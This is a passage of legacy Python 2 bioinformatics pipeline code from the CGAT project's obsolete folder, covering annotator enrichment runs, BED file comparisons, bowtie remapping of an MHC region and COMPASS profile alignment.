< %(promotors)s > %(tmpworkspace)s
'''
elif workspace == "promotors-go":
# promotors with GO categories
statement = '''cat < %(promotors)s |\
python %(scriptsdir)s/gtf2gtf.py \
--filter=gene \
--apply=<(cut -f 2 < %(gofile)s | sort | uniq ) |\
python %(scriptsdir)s/gff2annotator.py \
--section=workspace \
--max-length=0 \
--log=%(outfile)s.log \
> %(tmpworkspace)s
'''
elif workspace == "gene-territories":
statement = '''
python %(scriptsdir)s/gff2annotator.py \
--section=workspace \
--max-length=0 \
--log=%(outfile)s.log \
< %(annotator_geneterritories)s > %(tmpworkspace)s
'''
elif workspace == "mappable":
statement = '''
python %(scriptsdir)s/bed2gff.py < %(annotator_mappability)s |\
python %(scriptsdir)s/gff2annotator.py \
--section=workspace \
--max-length=0 \
--log=%(outfile)s.log \
> %(tmpworkspace)s
'''
else:
raise P.PipelineError("unknown workspace '%s'" % workspace )
P.run( **dict( locals().items() + PARAMS.items() ) )
tmpworkspaces.append( tmpworkspace )
return tmpworkspaces, tmpsynonyms
############################################################
############################################################
############################################################
##
############################################################
def buildAnnotatorAnnotations( tmpdir, outfile,
annotations=None,
bedfiles = None,
gofile = None):
'''write annotations.'''
tmpannotations = os.path.join( tmpdir, "annotations" )
to_cluster = True
job_options = "-l mem_free=4000M"
if annotations == "architecture":
statement = '''
cat %(promotors)s %(annotation)s |\
python %(scriptsdir)s/gff2annotator.py \
--section=annotations-gff \
--log=%(outfile)s.log \
> %(tmpannotations)s
'''
elif annotations=="go":
statement = '''
cat %(annotator_geneterritories)s |\
python %(scriptsdir)s/gff2annotator.py \
--section=annotations-go \
--input-filename-map=<(cut -f 2,4 < %(gofile)s) \
--log=%(outfile)s.log \
> %(tmpannotations)s
'''
elif bedfiles:
bedfiles = " ".join(bedfiles)
statement = '''
cat %(bedfiles)s |\
python %(scriptsdir)s/bed2annotator.py \
--max-length=0 \
--merge \
--section=annotations \
--log=%(outfile)s.log \
> %(tmpannotations)s
'''
else:
raise P.PipelineError("unknown annotations '%s'" % workspace )
P.run()
return tmpannotations
############################################################
############################################################
############################################################
##
############################################################
def buildAnnotatorSegments( tmpdir, infile, outfile ):
'''convert segments in bed format to annotator format
from infile to outfile.
'''
tmpsegments = os.path.join( tmpdir, "segments" )
to_cluster = True
statement = '''
python %(scriptsdir)s/bed2gff.py < %(infile)s |\
python %(scriptsdir)s/gff2annotator.py --log=%(outfile)s.log --section=segments > %(tmpsegments)s \
'''
P.run( **dict( locals().items() + PARAMS.items() ) )
return tmpsegments
############################################################
############################################################
############################################################
##
############################################################
def buildAnnotatorSegmentsFromDatabase( tmpdir, track,
outfile,
with_motif = None,
without_motif = None,
proportion = None):
'''output segments annotator format
with_motif
only output segments not matching motif
without_motif
only output segments not matching motif
proportion
only output top x percent of segments (peakval). If the
proportion is negative, the bottom x percent are output.
For example, proportion=-33 outputs the third of intervals
with the smallest peakval.
'''
tmpsegments = os.path.join( tmpdir, "segments" )
to_cluster = True
dbhandle = sqlite3.connect( PARAMS["database"] )
if with_motif:
statement = '''
SELECT i.contig, i.start, i.end, i.interval_id, i.peakval
FROM %(track)s_intervals AS i, %(track)s_mast AS m
WHERE i.interval_id = m.id
AND m.motif = '%(with_motif)s'
AND m.nmatches > 0
ORDER by i.contig, i.start''' % locals()
elif without_motif:
statement = '''
SELECT i.contig, i.start, i.end, i.interval_id, i.peakval
FROM %(track)s_intervals AS i, %(track)s_mast AS m
WHERE i.interval_id = m.id
AND m.motif = '%(without_motif)s'
AND m.nmatches = 0
ORDER by i.contig, i.start''' % locals()
elif proportion != None:
statement = '''SELECT COUNT(*) FROM %(track)s_intervals AS i'''
cc = dbhandle.cursor()
cc.execute( statement % locals() )
total = cc.fetchall()[0][0]
cutoff = int(float(total) * (abs(proportion) / 100.0))
if proportion > 0:
statement = '''
SELECT i.contig, i.start, i.end, i.interval_id, i.peakval
FROM %(track)s_intervals AS i
ORDER BY i.peakval DESC LIMIT %(cutoff)i
''' % locals()
else:
statement = '''
SELECT i.contig, i.start, i.end, i.interval_id, i.peakval
FROM %(track)s_intervals AS i
ORDER BY i.peakval ASC LIMIT %(cutoff)i
''' % locals()
cc = dbhandle.cursor()
try:
cc.execute( statement )
except sqlite3.OperationalError, msg:
E.warn( "error in sql statement: %s" % msg)
return None
contigs = collections.defaultdict( list )
for result in cc:
contig, start, end, interval_id,peakval = result
contigs[contig].append( (start,end) )
outs = open(tmpsegments, "w" )
gff2annotator.outputSegments( outs, contigs,
section = "segments" )
outs.close()
return tmpsegments
############################################################
############################################################
############################################################
##
############################################################
def runAnnotator( tmpdir, outfile,
tmpannotations,
tmpsegments,
tmpworkspaces,
tmpsynonyms,
options = ""):
'''run annotator.'''
if tmpsegments == None:
E.warn( "no segments - annotator not run for %s" % outfile )
return
if tmpannotations == None:
E.warn( "no annotations - annotator not run for %s" % outfile )
return
to_cluster = True
job_queue = "medium_jobs.q"
job_options = "-l mem_free=8000M"
workspace_options = ""
for x,workspace in enumerate( tmpworkspaces ):
if x == 0:
workspace_options += " -workspace %s" % workspace
else:
workspace_options += " -workspace%i %s" % (x+1, workspace)
if tmpsynonyms:
workspace_options += " -synonyms %s" % tmpsynonyms
statement = '''
java -Xmx8000M -cp %(annotator_dir)s/commons-cli-1.0.jar:%(annotator_dir)s/Annotator.jar app.Annotator \
-verbose 4 -iterations %(annotator_iterations)s \
-annotation %(tmpannotations)s \
-segments %(tmpsegments)s \
%(workspace_options)s \
%(options)s \
> %(outfile)s '''
P.run()
############################################################
############################################################
############################################################
## import annotator GO results
############################################################
def genericImportAnnotator( infiles, outfile, table, workspace, slice, subset, fdr_method ):
'''generic import of annotator results.
Assumes that the suffix of all infiles is the same.
'''
infile = " ".join(infiles)
x, suffix = os.path.splitext( infiles[0] )
tmpfilename = P.getTempFilename()
statement = '''
python %(scriptsdir)s/annotator.py \
--method=fdr-table \
--fdr-method=%(fdr_method)s \
--log=%(outfile)s.log \
--regex-id="(.*)%(suffix)s" \
%(infile)s > %(tmpfilename)s
'''
P.run()
tmpfile = P.getTempFile()
for line in open( tmpfilename, "r" ):
if line.startswith("id"):
line = "subset\tworkspace\tslice\t" + re.sub("^id", "track", line)
else:
line = "%s\t%s\t%s\t%s" % (subset, workspace, slice, line)
tmpfile.write(line)
tmpfile.close()
tmpfilename2 = tmpfile.name
statement = '''
python %(scriptsdir)s/csv2db.py %(csv2db_options)s \
--table=%(table)s
< %(tmpfilename2)s > %(outfile)s'''
P.run()
os.unlink( tmpfilename )
os.unlink( tmpfilename2 )
############################################################
############################################################
############################################################
##
############################################################
def makeAnnotatorGO( infile, outfile, gofile, workspace ):
'''check statistical overlap between intervals and genomic
segements having GO assignments.
worspace should be ``promotors`` or ``gene-territories``
'''
to_cluster = True
# require 4Gb of free memory
job_options = "-l mem_free=4000M"
tmpdir = tempfile.mkdtemp( dir = os.getcwd() )
annotations = buildAnnotatorAnnotations( tmpdir,
outfile,
annotations="go",
gofile = gofile )
# take only those promotors with GO categories for workspace
workspaces, synonyms = buildAnnotatorWorkSpace(
tmpdir, outfile,
workspaces = ("mappable", workspace),
gc_control=True )
segments = buildAnnotatorSegments( tmpdir, infile, outfile )
runAnnotator( tmpdir, outfile, annotations, segments, workspaces, synonyms )
############################################################
############################################################
############################################################
##
############################################################
def buildAnnotatorSegmentsROI( tmpdir, roi_class, outfile, overlap = None ):
'''convert segments in bed format to annotator format
from infile to outfile.
'''
tmpsegments = os.path.join( tmpdir, "segments" )
to_cluster = True
dbhandle = sqlite3.connect( PARAMS["database"] )
if overlap:
statement = '''
SELECT roi.contig, roi.start, roi.end
FROM regions_of_interest AS roi,
%(overlap)s_intervals AS i
WHERE roi.class='%(roi_class)s' AND
i.contig = roi.contig AND
min(roi.end, i.end) - max(roi.start, i.start) > 0
'''
else:
statement = '''
SELECT roi.contig, roi.start, roi.end
FROM regions_of_interest AS roi
WHERE class='%(roi_class)s'
'''
cc = dbhandle.cursor()
cc.execute( statement % locals() )
noutput = 0
contigs = collections.defaultdict( list )
for result in cc:
contig, start, end = result
contigs[contig].append( (start,end) )
noutput += 1
E.info("segments for roi_class `%s` and overlap `%s`: %i" % (roi_class, overlap, noutput))
outs = open(tmpsegments, "w" )
gff2annotator.outputSegments( outs, contigs,
section = "segments" )
outs.close()
if noutput == 0:
return None
else:
return tmpsegments
############################################################
############################################################
############################################################
##
############################################################
def makeAnnotatorROIGO( roi_class, outfile, gofile, workspace, overlap = None ):
'''check statistical overlap between intervals and genomic
segements having GO assignments.
worspace should be ``promotors`` or ``gene-territories``
'''
to_cluster = True
# require 4Gb of free memory
job_options = "-l mem_free=4000M"
tmpdir = tempfile.mkdtemp( dir = os.getcwd() )
segments = buildAnnotatorSegmentsROI( tmpdir,
roi_class,
outfile,
overlap = overlap )
if segments == None:
E.info("no segments for roi_class `%s` and overlap `%s` - no computation." %(roi_class,
overlap ))
return
annotations = buildAnnotatorAnnotations( tmpdir,
outfile,
annotations="go",
gofile = gofile )
# take only those promotors with GO categories for workspace
workspaces, synonyms = buildAnnotatorWorkSpace(
tmpdir, outfile,
workspaces = (workspace,),
gc_control=True )
# these are large segments, so increase bucket size
runAnnotator( tmpdir, outfile, annotations, segments, workspaces, synonyms,
"-bucketsize 100" )
############################################################
############################################################
############################################################
##
############################################################
def makeAnnotatorArchitecture( infile, outfile, **kwargs ):
'''check statistical overlap between intervals and and other genomic features
defined in the file PARAMS["annotations"].
Annotator is run with the following parameters:
1. Segments: the interval track
2. Annotations:
1. genomic architecture (PARAMS["annotation"])
2. promotors (PARAMS["promotors"])
3. Workspace: the full genome
'''
tmpdir = tempfile.mkdtemp( dir = os.getcwd() )
track = infile[:-len(".bed")]
if kwargs:
segments = buildAnnotatorSegmentsFromDatabase( tmpdir,
track, outfile,
**kwargs )
else:
segments = buildAnnotatorSegments( tmpdir, infile, outfile )
workspaces, synonyms = buildAnnotatorWorkSpace( tmpdir, outfile,
workspaces = ("mappable","genomic"),
gc_control=True )
annotations = buildAnnotatorAnnotations( tmpdir, outfile, annotations="architecture" )
runAnnotator( tmpdir, outfile, annotations, segments, workspaces, synonyms )
shutil.rmtree( tmpdir )
############################################################
############################################################
############################################################
##
############################################################
def makeAnnotatorTracks( infiles, outfile, **kwargs ):
'''check statistical overlap between intervals and selected ucsc tracks
Annotator is run with the following parameters:
1. Segments: the interval track
2. Annotations:
1. ucsc encode features
2. disease intervals (regions of interest)
3. Workspace: the full genome
'''
infile, infile_annotations = infiles
track = infile[:-len(".bed")]
tmpdir = tempfile.mkdtemp( dir = os.getcwd() )
if kwargs:
segments = buildAnnotatorSegmentsFromDatabase( tmpdir,
track, outfile,
**kwargs )
else:
segments = buildAnnotatorSegments( tmpdir, infile, outfile )
workspaces, synonyms = buildAnnotatorWorkSpace( tmpdir, outfile,
workspaces = ("mappable","genomic"),
gc_control = True )
annotations = buildAnnotatorAnnotations( tmpdir, outfile, bedfiles=(infile_annotations,) )
runAnnotator( tmpdir, outfile, annotations, segments, workspaces, synonyms )
shutil.rmtree( tmpdir )
############################################################
############################################################
############################################################
##
############################################################
def makeAnnotatorRegionsOfInterest( infiles, outfile, **kwargs ):
'''check statistical overlap between intervals regions of interest.
Annotator is run with the following parameters:
1. Segments: the interval track
2. Annotations:
1. disease intervals (regions of interest)
3. Workspace: mappable part of gene territories
'''
infile, infile_regions = infiles
track = infile[:-len(".bed")]
tmpdir = tempfile.mkdtemp( dir = os.getcwd() )
annotations = buildAnnotatorAnnotations( tmpdir, outfile, bedfiles=(infile_regions,) )
workspaces, synonyms = buildAnnotatorWorkSpace( tmpdir,
outfile,
workspaces = ("mappable", "gene-territories"),
gc_control = True )
if kwargs:
segments = buildAnnotatorSegmentsFromDatabase( tmpdir,
track, outfile,
**kwargs )
else:
segments = buildAnnotatorSegments( tmpdir, infile, outfile )
runAnnotator( tmpdir, outfile, annotations, segments, workspaces, synonyms )
shutil.rmtree( tmpdir )
############################################################
############################################################
############################################################
##
############################################################
def buildAnnotatorDistanceAnnotations( annotations = "expression" ):
'''build an annotations file for annotator_distance.'''
tmpfile = P.getTempFile( "." )
tmpfilename = tmpfile.name
if annotations == "expression":
dbhandle = sqlite3.connect( PARAMS["database"] )
cc = dbhandle.cursor()
statement = """
SELECT gene_id,
CASE WHEN %(annodist_master_expression_select)s THEN 'responsive' ELSE 'nonresponsive' END
FROM probeset2transcript AS e,
%(annodist_master_expression)s AS d
WHERE d.cluster_id = e.cluster_id
""" % dict( locals().items() + PARAMS.items() )
data = cc.execute( statement ).fetchall()
tmpfile.write("gene_id\tlabel\n" )
for gene_id, label in data: tmpfile.write("%s\t%s\n" % (gene_id, label ) )
tmpfile.close()
return tmpfilename
############################################################
############################################################
############################################################
##
############################################################
def makeAnnotatorDistance( infile,
outfile,
builder,
workspace,
workspace_label="direction",
annotations = None ):
'''check statistical association between intervals and
transcription start sites.
'''
to_cluster = True
target_path = os.path.join( os.path.abspath( PARAMS["exportdir"] ),
"annotator_distance",
outfile )
if os.path.exists( target_path): shutil.rmtree( target_path)
try:
os.makedirs( target_path )
except OSError:
pass
options = []
if annotations:
options.append( "--filename-annotations=%s" % annotations )
options = " ".join( options )
statement = '''
python %(scriptsdir)s/annotator_distance.py \
--workspace=%(workspace)s \
--segments=%(infile)s \
--segments-format=bed \
--counter=%(annodist_counter)s \
--workspace-label=%(workspace_label)s \
--sampler=permutation \
--transform-counts=cumulative \
--logscale=x \
--remove-overhangs \
--analysis=proximity \
--num-samples=%(annodist_iterations)i \
--num-bins=%(annodist_bins)i \
--hardcopy=%(target_path)s/%%s.png \
--output-filename-pattern=%(target_path)s/%%s.table \
--workspace-builder=%(builder)s \
--resolution=%(annodist_resolution_intergenic)s \
--plot
%(options)s < /dev/null > %(outfile)s'''
P.run()
```
#### File: cgat/obsolete/pipeline_vitaminD_compare.py
```python
import sys
import tempfile
import optparse
import shutil
import itertools
import csv
import math
import random
import re
import glob
import os
import shutil
import collections
import CGAT.Experiment as E
import CGAT.Pipeline as P
from ruffus import *
import csv
import sqlite3
import CGAT.IOTools as IOTools
import pysam
import numpy
import gzip
PARAMS=P.getParameters()
VERSIONS = ("version1", "version2", "version3", "version4", "version5")
@transform( "version1_*.bed", suffix(".bed"), ".compare")
def compare( infile, outfile ):
'''compare several bed-files.'''
pattern = re.match("version\d+_(.*).bed", infile).groups()[0]
files = " ".join( sorted(glob.glob( "version*_%s.bed" % pattern )) )
statement = '''
python %(scriptsdir)s/diff_bed.py %(files)s > %(outfile)s
'''
P.run( **dict( locals().items() + PARAMS.items() ) )
@transform( "version1_*.bed", suffix(".bed"), ".rest")
def difference_to1( infile, outfile ):
'''compare several bed-files. List the number of intervals that are not present in the other versions
compared to version 1.'''
track = re.match("version\d+_(.*).bed", infile).groups()[0]
tmpfile = P.getTempFilename()
for version in VERSIONS:
t = tmpfile + "%s" % version
if version == "version1":
statement = '''cut -f 5 < %(version)s_%(track)s.bed |\
python %(toolsdir)s/data2histogram.py --headers=%(version)s --bin-size=1 --min-value=1 > %(t)s
'''
else:
statement = '''
intersectBed -v -a version1_%(track)s.bed -b %(version)s_%(track)s.bed | cut -f 5 |\
python %(toolsdir)s/data2histogram.py --headers=%(version)s --bin-size=1 --min-value=1 > %(t)s
'''
P.run( **dict( locals().items() + PARAMS.items() ) )
statement = '''
python %(toolsdir)s/combine_tables.py --sort-keys=numeric %(tmpfile)s* > %(outfile)s
'''
P.run( **dict( locals().items() + PARAMS.items() ) )
@transform( "version2_*.bed", suffix(".bed"), ".rest2")
def difference_to2( infile, outfile ):
'''compare several bed-files.'''
track = re.match("version\d+_(.*).bed", infile).groups()[0]
tmpfile = P.getTempFilename()
for version in VERSIONS:
t = tmpfile + "%s" % version
if version == "version2":
statement = '''cut -f 5 < %(version)s_%(track)s.bed |\
python %(toolsdir)s/data2histogram.py --headers=%(version)s --bin-size=1 --min-value=1 > %(t)s
'''
else:
statement = '''
intersectBed -v -a version2_%(track)s.bed -b %(version)s_%(track)s.bed | cut -f 5 |\
python %(toolsdir)s/data2histogram.py --headers=%(version)s --bin-size=1 --min-value=1 > %(t)s
'''
P.run( **dict( locals().items() + PARAMS.items() ) )
statement = '''
python %(toolsdir)s/combine_tables.py --sort-keys=numeric %(tmpfile)s* > %(outfile)s
'''
P.run( **dict( locals().items() + PARAMS.items() ) )
if __name__== "__main__":
sys.exit( P.main(sys.argv) )
```
#### File: cgat/obsolete/pipeline_vitaminDMHC.py
```python
CONTIG,START,END = "chr6", 28000000,34000000
import sys
import tempfile
import optparse
import shutil
import itertools
import random
from ruffus import *
import CGAT.Experiment as E
import CGAT.Pipeline as P
import CGAT.IndexedFasta as IndexedFasta
import CGAT.IndexedGenome as IndexedGenome
import pysam
import pipeline_vitaminD
PARAMS = pipeline_vitaminD.PARAMS
############################################################
############################################################
############################################################
@files( (("genome.fasta", 'subsequence.fasta'),) )
def extractSequence( infile, outfile ):
'''extract genomic sequence to be aligned against.'''
fasta = IndexedFasta.IndexedFasta( infile[:-len(".fasta")] )
outs = open( outfile,"w")
outs.write( ">%s\n%s\n" % (CONTIG, fasta.getSequence( CONTIG, "+", START, END) ))
outs.close()
############################################################
############################################################
############################################################
@files_re( extractSequence, '(.*).fasta', r'\1.ebwt')
def buildBowtieIndex( infile, outfile ):
statement = '''bowtie-build %(infile)s %(outfile)s > %(outfile)s'''
P.run( **dict( locals().items() + PARAMS.items() ) )
############################################################
############################################################
############################################################
@follows( extractSequence, buildBowtieIndex)
@files_re( '../*.bam', '../(.*).bam', (r"../\1.bam", "subsequence.ebwt"), r"\1.bam" )
def remapWithBowtie( infiles, outfile ):
'''re-map unaligned reads.
Select those reads that have not been mapped from a bam file (flag-value = 4)
and map again with Bowtie.
'''
to_cluster = True
tmpfilename = P.getTempFilename()
prefix = outfile[:-len(".bam")]
infile, subsequence = infiles
start = START
statement = '''
samtools view %(infile)s |\
awk '$2 == 4 {printf("@%%s\\n%%s\\n+\\n%%s\\n", $1,$10,$11);}' |\
bowtie --sam -n 3 %(subsequence)s - 2>%(outfile)s.log |\
awk -v OFS="\\t" '/^@/ {print;next;} {if ($4 > 0) { $4 += %(start)s } print; }' |\
samtools import %(genome)s - %(tmpfilename)s >& %(outfile)s.log;
samtools sort %(tmpfilename)s %(prefix)s;
samtools index %(outfile)s;
rm -f %(tmpfilename)s
'''
P.run( **dict( locals().items() + PARAMS.items() ) )
if os.path.exists( tmpfilename ):
os.unlink( tmpfilename )
@files_re( remapWithBowtie,
"(.*).bam",
r"\1.bigwig" )
def buildBigwig( infile, outfile ):
pipeline_vitaminD.buildBigwig( infile, outfile )
@files_re( remapWithBowtie,
"(.*).bam",
r"\1.readstats" )
def buildBAMStats( infile, outfile ):
pipeline_vitaminD.buildBAMStats( infile, outfile )
def getMappedReads( infile ):
'''return number of reads mapped.
'''
for lines in open(infile,"r"):
data = lines[:-1].split("\t")
if data[1].startswith( "mapped"):
return int(data[0])
return
def getMinimumMappedReads( infiles ):
'''find the minimum number of mapped reads in infiles.'''
v = []
for infile in infiles:
x = getMappedReads( infile )
if x: v.append( x )
return min(v)
@follows( buildBAMStats )
@files_re( remapWithBowtie,
"(.*).bam",
(r"\1.bam", r"\1.readstats" ),
r"\1.normbam" )
def buildNormalizedBAM( infiles, outfile ):
'''run MACS.'''
min_reads = getMinimumMappedReads( glob.glob("*.readstats") )
infile, statsfile = infiles
num_reads = getMappedReads( statsfile )
pysam_in = pysam.Samfile( infile, "rb" )
pysam_out = pysam.Samfile( outfile, "wb", template = pysam_in )
ninput, noutput = 0, 0
take = [1] * min_reads + [0] * (num_reads-min_reads)
random.shuffle( take )
# iterate over mapped reads
for read in pysam_in.fetch():
if take[ninput]:
pysam_out.write( read )
noutput += 1
ninput += 1
pysam_in.close()
pysam_out.close()
P.info( "buildNormalizedBam: %i input, %i output (%5.2f%%), should be %i" % (ninput, noutput, 100.0*noutput/ninput, min_reads ))
@files_re( buildNormalizedBAM,
"(.*).normbam",
r"\1.macs" )
def runMACS( infile, outfile ):
to_cluster = False
track = infile[:-len("normbam")]
try:
control = pipeline_vitaminD.getControl( track ) + ".bam"
except AssertionError:
return
statement = '''
macs -t %(infile)s -c %(control)s \
--name=%(outfile)s \
--format=bam --tsize=35 --bw=110 --mfold=8 --gsize=6000000 >& %(outfile)s'''
P.run( **dict( locals().items() + PARAMS.items() ) )
@follows( remapWithBowtie, buildBigwig, runMACS )
def full():
pass
if __name__== "__main__":
P.checkFiles( ("genome.fasta", "genome.idx" ) )
P.checkExecutables( ("liftOver",) )
sys.exit( P.main(sys.argv) )
```
#### File: cgat/obsolete/profile_vs_profile.py
```python
import os
import sys
import string
import re
import tempfile
import subprocess
import optparse
import time
import math
import shutil
#--------------------------------------------------------
#--------------------------------------------------------
#--------------------------------------------------------
# import of user libraries
#--------------------------------------------------------
import CGAT.Experiment as Experiment
import alignlib
from ProfileLibrary import ProfileLibrary
from ProfileLibraryCompass import ProfileLibraryCompass
def getKeys( plib, start = None, end = None ):
"""get keys of profiles to compare."""
k = plib.keys()
k.sort()
if not start: start = 0
if not end: end = len(k)
return k[max(0,start):min(end,len(k))], start, end
class CompassResult:
def __init__(self):
pass
class AlignatorCompass:
mAligner = "compass_db1Xdb2"
mReferenceLength = 1000000
def __init__(self):
self.mTempdir = tempfile.mkdtemp()
self.mFilenameQuery = self.mTempdir + "/query"
self.mFilenameSbjct = self.mTempdir + "/sbjct"
self.mFilenameQueryLength = self.mFilenameQuery + ".len"
self.mFilenameSbjctLength = self.mFilenameSbjct + ".len"
outfile = open( self.mFilenameQueryLength, "w" )
outfile.write( "%i\n" % self.mReferenceLength )
outfile.close()
outfile = open( self.mFilenameSbjctLength, "w" )
outfile.write( "%i\n" % self.mReferenceLength )
outfile.close()
def __del__( self ):
# shutil.rmtree( self.mTempdir ) did not work
for f in (self.mFilenameQuery, self.mFilenameSbjct,
self.mFilenameQueryLength, self.mFilenameSbjctLength ):
if os.path.exists(f):
os.remove(f)
os.rmdir( self.mTempdir )
def writeProfile( self, filename, profile, name = None ):
if name:
old_name = profile.getName()
profile.setName( name )
outfile = open( filename, "w" )
profile.save( outfile )
outfile.close()
if name: profile.setName( old_name )
def align( self, query, sbjct, map_querysbjct ):
"""align query and sbjct profile.
Result is stored in map_query2sbjct. In addition,
a method specific result object is returned.
"""
self.writeProfile( self.mFilenameQuery, query, "query" )
self.writeProfile( self.mFilenameSbjct, sbjct, "sbjct" )
statement = "%s -i %s -j %s" % (self.mAligner, self.mFilenameQuery, self.mFilenameSbjct )
s = subprocess.Popen( statement,
shell = True,
stdout = subprocess.PIPE,
stderr = subprocess.PIPE,
cwd = self.mTempdir,
close_fds = True)
(out, err) = s.communicate()
if s.returncode != 0:
raise "Error in running %s \n%s\n%s\nTemporary directory in %s" % (statement, err, out, self.mTempdir)
return self.parseResult( out, err, map_query2sbjct )
def addBlocks( self,
query_index, query_ali,
sbjct_index, sbjct_ali,
map_query2sbjct ):
""" parse alignment. From the COMPASS website:
CAPITAL letters: residues at positions aligned by COMPASS, i.e. at input alignment positions
with gap content < threshold of gap fraction (see above);
lower-case letters: residues at positions not used by COMPASS, i.e. at input alignment positions
with gap content >= threshold of gap fraction (see above);
'-' : gaps retained from original alignments at positions aligned by COMPASS, i.e. at positions
with gap content < threshold;
'.' : gaps retained from original alignments at positions not used by COMPASS, i.e. at positions
with gap content >= threshold;
'=' : gaps introduced by COMPASS in profile-profile alignment;
'~' : gaps introduced by COMPASS against positions that are not used in the construction of
profile-profile alignment (positions with gap content >= threshold);
"""
gap_chars = "=~"
for x in range( 0, len(query_ali) ):
# skip over gaps introduced by compass
if query_ali[x] in gap_chars:
sbjct_index += 1
continue
elif sbjct_ali[x] in gap_chars:
query_index += 1
continue
is_unaligned = False
# deal with unaligned positions - these can be matched up
if query_ali[x] in string.lowercase:
query_index += 1
is_unaligned = True
if sbjct_ali[x] in string.lowercase:
sbjct_index += 1
is_unaligned = True
if is_unaligned: continue
map_query2sbjct.addPair( query_index, sbjct_index )
query_index += 1
sbjct_index += 1
return query_index, sbjct_index
def parseResult( self, out, err, map_query2sbjct ):
"""parse result from compass."""
result = CompassResult()
map_query2sbjct.clear()
lines = out.split("\n")
result.mQuery, result.mSbjct = re.match( "Ali1:\s+(\S+)\s+Ali2:\s+(\S+)", lines[0]).groups()
result.mQueryLength, result.mQueryLengthFiltered, result.mSbjctLength, result.mSbjctLengthFiltered = \
map( int, re.match("length1=(\d+)\s+filtered_length1=(\d+)\s+length2=(\d+)\s+filtered_length2=(\d+)", lines[2] ).groups() )
result.mQueryNSeqs, result.mQueryNEffective, result.mSbjctNSeqs, result.mSbjctNEffective = \
map( float, re.match("Nseqs1=(\S+)\s+Neff1=(\S+)\s+Nseqs2=(\d+)\s+Neff2=(\S+)", lines[3] ).groups() )
result.score, result.mEvalue = \
map( float, re.match("Smith-Waterman score = (\S+)\s+Evalue = (\S+)", lines[4]).groups() )
x = 6
d, query_index, query_ali = re.split("\s+", lines[x] )
d, sbjct_index, sbjct_ali = re.split("\s+", lines[x+2] )
query_index, sbjct_index = self.addBlocks( int(query_index) - 1, query_ali,
int(sbjct_index) - 1, sbjct_ali,
map_query2sbjct )
for x in range( 11, len(lines), 5):
d, query_ali = re.split("\s+", lines[x] )
d, sbjct_ali = re.split("\s+", lines[x+2] )
query_index, sbjct_index = self.addBlocks( query_index, query_ali,
sbjct_index, sbjct_ali,
map_query2sbjct )
map_query2sbjct.setScore( result.score )
#--------------------------------------------------------
#--------------------------------------------------------
#--------------------------------------------------------
# main part of script
#--------------------------------------------------------
if __name__ == "__main__":
#--------------------------------------------------------
# command line parsing options
parser = optparse.OptionParser( version = "%prog version: $Id: profile_vs_profile.py 2781 2009-09-10 11:33:14Z andreas $", usage = globals()["__doc__"])
parser.add_option("-q", "--query", dest="query", type="string",
help="query profile library." )
parser.add_option("-s", "--sbjct", dest="sbjct", type="string",
help="sbjct profile library." )
parser.add_option("-e", "--self-compare", dest="self_compare", action="store_true",
help="self-comparison. Only compare one direction." )
parser.add_option( "--query-start", dest="query_start", type="int",
help="start at xth entry of query." )
parser.add_option( "--query-end", dest="query_end", type="int",
help="stop at xth entry of query." )
parser.add_option( "--sbjct-start", dest="sbjct_start", type="int",
help="start at xth entry of sbjct." )
parser.add_option( "--sbjct-end", dest="sbjct_end", type="int",
help="stop at xth entry of sbjct." )
parser.add_option( "--filename-pairs", dest="filename_pairs", type="string",
help="align a list of pairs." )
parser.add_option( "--iterative-min-score", dest="iterative_min_score", type="float",
help="score threshold for iterative alignment." )
parser.add_option( "--alignment-mode", dest="alignment_mode", type="choice",
choices=("iterative-profile", "iterative-sequence", "compass"),
help="alignment mode." )
parser.set_defaults( query = None,
sbjct = None,
query_start = None,
query_end = None,
sbjct_start = None,
sbjct_end = None,
report_step = 100,
filename_pairs= None,
iterative_min_score = 40.0,
alignment_mode = "iterative-profile",
)
(options, args) = Experiment.Start( parser )
#--------------------------------------------------------
# main part of script
if not options.query:
print USAGE
raise "please supply a query."
if options.self_compare:
options.sbjct = options.query
if options.sbjct_end and options.query_start and \
options.sbjct_end < options.query_start:
if options.loglevel >= 1:
options.stdlog.write( "# subsections to compare are out of range for self comparison." )
Experiment.Stop()
sys.exit(0)
## adjust sbjct start to upper diagonal
if options.query_start and options.sbjct_start:
options.sbjct_start = max( options.query_start, options.sbjct_start )
else:
if not options.sbjct:
print USAGE
raise "please supply both a query and a sbjct."
if options.alignment_mode == "compass":
plib_query = ProfileLibraryCompass( options.query, "r" )
plib_sbjct = ProfileLibraryCompass( options.sbjct, "r" )
else:
plib_query = ProfileLibrary( options.query, "r" )
plib_sbjct = ProfileLibrary( options.sbjct, "r" )
if options.alignment_mode == "iterative-profile":
alignator1 = alignlib.makeAlignatorDPFull( alignlib.ALIGNMENT_LOCAL, -10.0, -2.0 )
alignator = alignlib.makeAlignatorIterative( alignator1, options.iterative_min_score )
elif options.alignment_mode == "iterative-sequence":
class AlignatorSequence:
def __init__(self):
self.mAlignator1 = alignlib.makeAlignatorDPFull( alignlib.ALIGNMENT_LOCAL, -10.0, -2.0 )
self.mAlignator = alignlib.makeAlignatorIterative( self.mAlignator1, options.iterative_min_score )
def align(self, query, sbjct, map_query2sbjct):
xrow = alignlib.makeSequence(query.asString())
xcol = alignlib.makeSequence(sbjct.asString())
self.mAlignator.align( xrow, xcol, map_query2sbjct)
alignator = AlignatorSequence()
elif options.alignment_mode == "compass":
alignator = AlignatorCompass()
else:
raise "unknown alignment mode %s" % options.alignment_mode
map_query2sbjct = alignlib.makeAlignmentVector()
def __align( query_profile, sbjct_profile ):
"""align two profiles and output the result."""
alignator.align( query_profile, sbjct_profile, map_query2sbjct )
blocks = alignlib.AlignedBlocks( map_query2sbjct )
if options.loglevel >= 3:
options.stdlog.write( str(map_query2sbjct) )
if map_query2sbjct.getLength() > 0:
options.stdout.write("%s\t%s\t%i\t%s\n" % (
query, sbjct, map_query2sbjct.getScore(), str(blocks) ) )
return 1
return 0
t_start = time.time()
def __report( noutput, ntotal ):
global t_start
if options.loglevel >= 1 and noutput % options.report_step == 0:
t = time.time() - t_start
options.stdlog.write( "# alignment: %5i (%5.2f)%%, query=%s, sbjct=%s, t=%i, <t>=%5.2fs, etf=%5.2fs, %5.2fh, et=%5.2fh\n" % \
(noutput, 100.0 * noutput / ntotal,
query, sbjct,
t,
float(t)/noutput,
float(t)/noutput * (ntotal-noutput),
float(t)/noutput * (ntotal-noutput) / 3600,
float(t)/noutput * ntotal / 3600) )
options.stdlog.flush()
options.stdout.flush()
noutput = 0
nempty = 0
npairs = 0
if options.filename_pairs:
pairs = []
infile = open( options.filename_pairs, "r" )
for line in infile:
if line[0] == "#": continue
query, sbjct = line[:-1].split("\t")[:2]
pairs.append( (query, sbjct) )
infile.close()
